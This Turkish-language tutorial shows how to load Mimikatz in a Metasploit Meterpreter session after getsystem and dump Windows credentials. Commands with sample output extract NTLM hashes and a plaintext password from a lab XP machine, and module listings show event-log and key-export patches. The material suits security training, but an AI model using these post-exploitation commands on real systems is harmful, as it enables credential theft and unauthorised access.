MSF Mimikatz

Estimated read time 9 min read

Metasploit Framework, çok yönlü kullanım imkanları sağlamaktadır. Bu sebeple, harici kaynaklardan kodları da sistem içine dahil etmek mümkündür. Bu yazımızda, mimikatz uygulamasının Metasploit Framework içinde kullanımı ile ilgili örneklere bakacağız.

Mimikatz nedir?

Mimikatz, esasında Benjamin Delpy tarafından yazılan bir post-exploitation programıdır. Hedef bilgisayardan bilgi toplama için kullanılır. Mimikatz, bilgi toplama için gerekli bir çok farklı komutu bünyesinde toplamıştır.

Mimikatz Yükleme

Mimikatz, hedef sistemde bir Meterpreter oturumu açtıktan sonra çalıştırılabilir. Sisteme herhangi bir dosya yüklemeye gerek kalmadan hafıza üzerinde çalışır. Etkin olarak çalışabilmesi için SYSTEM seviyesinde oturum yetkilerine sahip olmamız gerekir.

meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator

Bu çıktıda, hedef sistemde SYSTEM seviyesinde olmadığımız görülmektedir. Öncelikle SYSTEM seviyesine geçmeye çalışalım.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Başarılı olduysanız yukarıdaki gibi SYSTEM seviyesine geçtiğinize dair çıktı alırsınız.

Mimikatz, 32-bit ve 64-bit mimarilerde çalışmak üzere tasarlanmıştır. SYSTEM seviyesine geçtikten sonra hedef sistemin mimarisinin ne olduğuna sysinfo komutuyla bakmalıyız. Bazen, Meterpreter oturum 64-bit mimaride çalışan bir 32-bit mimari prosesinde oturum açmış olabilir. Bu durumda mimikatz’ın bazı özellikleri çalışmayacaktır. Meterpreter oturumu 32-bit bir proseste çalışıyorsa (Mimari aslında 64-bit olmasına rağmen), mimikatz, 32-bit için yazılımları kullanmaya çalışacaktır. Bunun önüne geçmenin yolu ps komutuyla çalışan proseslere bakmak ve migrate komutuyla başka bir prosese geçmektir.

meterpreter > sysinfo
Computer    : WINXP-E95CE571A1
OS       : Windows XP (Build 2600, Service Pack 3).
Architecture  : x86
System Language : en_US
Meterpreter   : x86/win32

Burada görülen çıktıda, hedef makinenin zaten 32-bit mimaride olduğunu görüyoruz. O zaman, 32-bit, 64-bit çakışması bulunmamaktadır. Artık mimikatz modülünü yükleyebiliriz.

meterpreter > load mimikatz
Loading extension mimikatz...success.

Yükleme başarıyla tamamlandıktan sonra öncelikle yardım bilgisini görüntüleyelim.

meterpreter > help mimikatz

Mimikatz Commands
=================

  Command      Description
  -------      -----------
  kerberos     Attempt to retrieve kerberos creds
  livessp      Attempt to retrieve livessp creds
  mimikatz_command Run a custom commannd
  msv        Attempt to retrieve msv creds (hashes)
  ssp        Attempt to retrieve ssp creds
  tspkg       Attempt to retrieve tspkg creds
  wdigest      Attempt to retrieve wdigest creds

Mimikatz, temel olarak yukarıdaki komutları kullanmamızı sağlarsa da içlerinde en güçlüsü mimikatz_command seçeneğidir.

Öncelikle mimikatz sürümünü kontrol edelim.

meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Nov 7 2013 08:21:02)

Mimikatz’ın sağladığı bir takım modüller bulunur. Bu modüllerin listesini görmek için sistemde bulunmayan bir modül ismi vermeniz yeterlidir. Bu durumda mimikatz size kullanılabilir modüllerin listesini verecektir. Komut kullanımında modüladı:: kullanım formatına dikkat edin.

Aşağıdaki örnekte, fu:: modülü istenmiştir. Böyle bir modül olmadığından kullanılabilir tüm modülleri listelemiş olduk.

meterpreter > mimikatz_command -f fu::
Module : 'fu' introuvable

Modules disponibles : 
        - Standard
   crypto  - Cryptographie et certificats
    hash  - Hash
   system  - Gestion système
   process  - Manipulation des processus
   thread  - Manipulation des threads
   service  - Manipulation des services
  privilege  - Manipulation des privilèges
   handle  - Manipulation des handles
 impersonate  - Manipulation tokens d'accès
   winmine  - Manipulation du démineur
 minesweeper  - Manipulation du démineur 7
    nogpo  - Anti-gpo et patchs divers
   samdump  - Dump de SAM
   inject  - Injecteur de librairies
     ts  - Terminal Server
   divers  - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
  sekurlsa  - Dump des sessions courantes par providers LSASS
     efs  - Manipulations EFS

Bu listede bulunan modüllerin kullanılabilir seçeneklerini listelemek için modül ismini vererek girilen komut aşağıdaki formatta kullanılmaktadır.

meterpreter > mimikatz_command -f divers::
Module : 'divers' identifié, mais commande '' introuvable

Description du module : Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
 noroutemon  - [experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage
  eventdrop  - [super experimental] Patch l'observateur d'événements pour ne plus rien enregistrer
 cancelator  - Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session
   secrets  - Affiche les secrets utilisateur

Gördüğünüz gibi drivers modülünün, noroutemon, eventdrop, cancelator, secrets seçenekleri bulunmaktadır.

RAM Hafızadan Hash ve Parola Okuma

RAM hafızadan Hash değerlerini ve parolaları okumak için Metasploit Framework’ün sağladığı kendi komutlarını kullanabileceğimiz gibi mimikaz modüllerini de kullanabiliriz.

Metasploit Komutları ile Bilgi Elde etme

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID  Package  Domain      User       Password
------  -------  ------      ----       --------
0;78980 NTLM    WINXP-E95CE571A1 Administrator   lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f }
0;996  Negotiate NT AUTHORITY   NETWORK SERVICE  lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997  Negotiate NT AUTHORITY   LOCAL SERVICE   n.s. (Credentials KO)
0;56683 NTLM                     n.s. (Credentials KO)
0;999  NTLM    WORKGROUP    WINXP-E95CE571A1$ n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID  Package  Domain      User       Password
------  -------  ------      ----       --------
0;999  NTLM    WORKGROUP    WINXP-E95CE571A1$ 
0;997  Negotiate NT AUTHORITY   LOCAL SERVICE   
0;56683 NTLM                     
0;996  Negotiate NT AUTHORITY   NETWORK SERVICE  
0;78980 NTLM    WINXP-E95CE571A1 Administrator   SuperSecretPassword

Mimikatz Modülleri ile Bilgi Elde Etme

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : winxp-e95ce571a1
BootKey  : 553d8c1349162121e2a5d3d0f571db7f

Rid : 500
User : Administrator
LM  : 
NTLM : d6eec67681a3be111b5605849505628f

Rid : 501
User : Guest
LM  : 
NTLM : 

Rid : 1000
User : HelpAssistant
LM  : 6165cd1a0ebc61e470475c82cd451e14
NTLM : 

Rid : 1002
User : SUPPORT_388945a0
LM  : 
NTLM : 771ee1fce7225b28f8aec4a88aea9b6a

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword }

Diğer Modüller

Yukarıda örnek olarak gösterilen modüllerin haricinde başka modüllerde bulunur. Bunların tamamını Mimikatz web sayfasından inceleyebilirsiniz.

Kullanıcı Token Bilgileri

meterpreter > mimikatz_command -f handle::
Module : 'handle' identifié, mais commande '' introuvable

Description du module : Manipulation des handles
list       - Affiche les handles du système (pour le moment juste les processus et tokens)
processStop    - Essaye de stopper un ou plusieurs processus en utilisant d'autres handles
tokenImpersonate - Essaye d'impersonaliser un token en utilisant d'autres handles
nullAcl      - Positionne une ACL null sur des Handles


meterpreter > mimikatz_command -f handle::list
...snip...
 760 lsass.exe         -> 1004    Token      NT AUTHORITY\NETWORK SERVICE
 760 lsass.exe         -> 1008    Process 704   winlogon.exe
 760 lsass.exe         -> 1052    Process 980   svchost.exe
 760 lsass.exe         -> 1072    Process 2664  fubar.exe
 760 lsass.exe         -> 1084    Token      NT AUTHORITY\LOCAL SERVICE
 760 lsass.exe         -> 1096    Process 704   winlogon.exe
 760 lsass.exe         -> 1264    Process 1124  svchost.exe
 760 lsass.exe         -> 1272    Token      NT AUTHORITY\ANONYMOUS LOGON
 760 lsass.exe         -> 1276    Process 1804  psia.exe
 760 lsass.exe         -> 1352    Process 480   jusched.exe
 760 lsass.exe         -> 1360    Process 2056  TPAutoConnSvc.exe
 760 lsass.exe         -> 1424    Token      WINXP-E95CE571A1\Administrator
...snip...

Windows Servisleri İşlemleri

Mimikatz, Windows servislerini başlatma, durdurma ve kaldırma imkanı da sağlamaktadır. Servis modülüne ve seçeneklerine bakalım.

meterpreter > mimikatz_command -f service::
Module : 'service' identifié, mais commande '' introuvable

Description du module : Manipulation des services
    list  - Liste les services et pilotes
    start  - Démarre un service ou pilote
    stop  - Arrête un service ou pilote
   remove  - Supprime un service ou pilote
  mimikatz  - Installe et/ou démarre le pilote mimikatz

Bu seçeneklerden, listeleme modülünü kullanalım.

meterpreter > mimikatz_command -f service::list
...snip...
    WIN32_SHARE_PROCESS   STOPPED RemoteRegistry Remote Registry
    KERNEL_DRIVER  RUNNING RFCOMM Bluetooth Device (RFCOMM Protocol TDI)
    WIN32_OWN_PROCESS    STOPPED RpcLocator   Remote Procedure Call (RPC) Locator
 980  WIN32_OWN_PROCESS    RUNNING RpcSs  Remote Procedure Call (RPC)
    WIN32_OWN_PROCESS    STOPPED RSVP  QoS RSVP
 760  WIN32_SHARE_PROCESS   RUNNING SamSs  Security Accounts Manager
    WIN32_SHARE_PROCESS   STOPPED SCardSvr    Smart Card
 1124  WIN32_SHARE_PROCESS   RUNNING Schedule    Task Scheduler
    KERNEL_DRIVER  STOPPED Secdrv Secdrv
 1124  INTERACTIVE_PROCESS   WIN32_SHARE_PROCESS   RUNNING seclogon    Secondary Logon
 1804  WIN32_OWN_PROCESS    RUNNING Secunia PSI Agent    Secunia PSI Agent
 3460  WIN32_OWN_PROCESS    RUNNING Secunia Update Agent  Secunia Update Agent
...snip...

Kripto Modülü

Mimikatz’ın sağladığı kripto modülüne ve seçeneklerine bakalım.

meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identifié, mais commande '' introuvable

Description du module : Cryptographie et certificats
listProviders  - Liste les providers installés)
 listStores  - Liste les magasins système
listCertificates    - Liste les certificats
  listKeys  - Liste les conteneurs de clés
exportCertificates   - Exporte les certificats
 exportKeys  - Exporte les clés
  patchcng  - [experimental] Patch le gestionnaire de clés pour l'export de clés non exportable
  patchcapi  - [experimental] Patch la CryptoAPI courante pour l'export de clés non exportable

Bu seçeneklerden listProviders seçeneğini kullanalım.

meterpreter > mimikatz_command -f crypto::listProviders
Providers CryptoAPI :
    Gemplus GemSAFE Card CSP v1.0
    Infineon SICRYPT Base Smart Card CSP
    Microsoft Base Cryptographic Provider v1.0
    Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
    Microsoft Base DSS Cryptographic Provider
    Microsoft Base Smart Card Crypto Provider
    Microsoft DH SChannel Cryptographic Provider
    Microsoft Enhanced Cryptographic Provider v1.0
    Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
    Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)
    Microsoft RSA SChannel Cryptographic Provider
    Microsoft Strong Cryptographic Provider

Yukarıdaki örneklerden göreceğiniz gibi, Mimikatz’a ait modüller ve bu modüllerin seçenekleri bulunuyor. Çok geniş ihtimaller dahilinde kullanabileceğiniz komutları tek tek deneyerek tecrübe kazanmanızı tavsiye ediyorum.